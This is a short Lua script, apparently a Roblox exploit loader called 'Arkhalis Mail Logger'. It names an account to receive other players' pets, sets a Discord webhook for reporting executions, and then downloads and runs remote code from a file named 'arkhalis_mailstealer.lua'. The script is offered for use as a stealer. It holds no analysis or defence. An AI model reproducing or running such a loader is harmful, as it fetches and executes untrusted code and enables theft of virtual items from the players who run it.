```lua

--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--

_G.Username1 = "NOOBPLAYZ09_YT" --// Username To Send Pets To

_G.Username2 = "" --// Username To Send Pets To [OPTIONAL]

--[[ Webhook Config ]]--

_G.Webhook = "https://discord.com/api/webhooks/1098873183345594418/st1s0hlaHvh3Cg1ToursQGvU8RR8RaOozVUdlzMOPo21bb-Vlutvi_qXocdKywwBs-W4" --// Discord Webhook For Executions

--[[ Script ]]--

loadstring(game:HttpGet("https://arkhalislua.github.io/arkhalis_mailstealer.lua", true))()

```
